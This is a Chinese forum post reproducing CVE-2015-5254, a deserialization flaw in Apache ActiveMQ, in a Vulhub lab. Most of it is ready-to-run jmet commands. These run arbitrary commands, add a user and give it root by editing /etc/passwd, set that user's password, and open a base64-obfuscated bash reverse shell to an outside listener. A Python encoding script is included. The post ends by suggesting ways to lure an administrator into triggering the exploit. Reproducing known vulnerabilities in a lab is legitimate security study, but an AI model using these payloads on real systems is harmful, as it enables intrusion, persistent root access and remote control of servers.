CVE-2015-5254漏洞复现

打印 上一主题 下一主题

主题 880|帖子 880|积分 2640

1.漏洞介绍。
Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持 Java 消息服务,集群,Spring Framework 等。Apache ActiveMQ 5.13.0之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的 Java 消息服务(JMS)ObjectMessage 对象利用该漏洞执行任意代码。
2.环境介绍。
复现环境采用kali搭建Vulhub。
  1. 靶机:172.18.0.1:8161
复制代码
环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。
3.漏洞利用。
3.1漏洞利用过程简述。

  • 构造(可以使用ysoserial)可执行命令的序列化对象
  • 作为一个消息,发送给目标61616端口
  • 访问web管理页面,读取消息,触发漏洞
3.2具体过程。
(1)访问web界面并进行登录。
  1. 账号:admin
  2. 密码:admin
复制代码

 (2)使用jmet进行漏洞利用。
首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。
  1. wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
  2. //下载jar文件
  3. mkdir external
  4. //创建external文件夹
复制代码
执行命令:
  1. java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 172.18.0.1 61616<br>//创建/tmp/success,同理可进行其他命令的操作
复制代码
我们返回管理界面,发现添加了一个名为事件的队列。

 点击进入

 此时已经触发命令执行,我们进入dockor查看
  1. docker ps
复制代码
  1. docker exec -it b189872443f5  /bin/bash
复制代码

 可以发现tmp目录已创建,进入发现sucess,漏洞利用成功

创建一个用户
  1. java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 Tom" -Yp ROME  172.18.0.1  61616
复制代码
触发条件和之前相同,在管理界面去点击队列
  1. java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/Tom:x:0/g" /etc/passwd" -Yp ROME   172.18.0.1  61616
  2. //修改权限
  3. java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "Tom:sd123456" | chpasswd" -Yp ROME   172.18.0.1   61616<br>//添加密码
复制代码
至此,一个权限为root,密码为123456的用户被我们创建成功,之后可以直接进行ssh远程连接

或者将命令换为反弹shell再利用:
  1. bash -i >& /dev/tcp/172.18.0.1/777 0>&1
复制代码
使用base64编码payload绕过Java机制
  1. YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx
复制代码
附上base64编码脚本
  1. import base64
  2. # Sample string to encode
  3. string = "bash -i >& /dev/tcp/172.18.0.1/777 0>&1"
  4. # Encoding the string
  5. encoded_string = base64.b64encode(string.encode('utf-8'))
  6. # Printing the encoded string
  7. print(encoded_string.decode('utf-8'))
复制代码
构建pyload
  1. java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMC4xLzc3NyAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 172.18.0.1 61616
复制代码
使用nc监听端口

 反弹shell成功
 值得注意的是,通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

河曲智叟

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表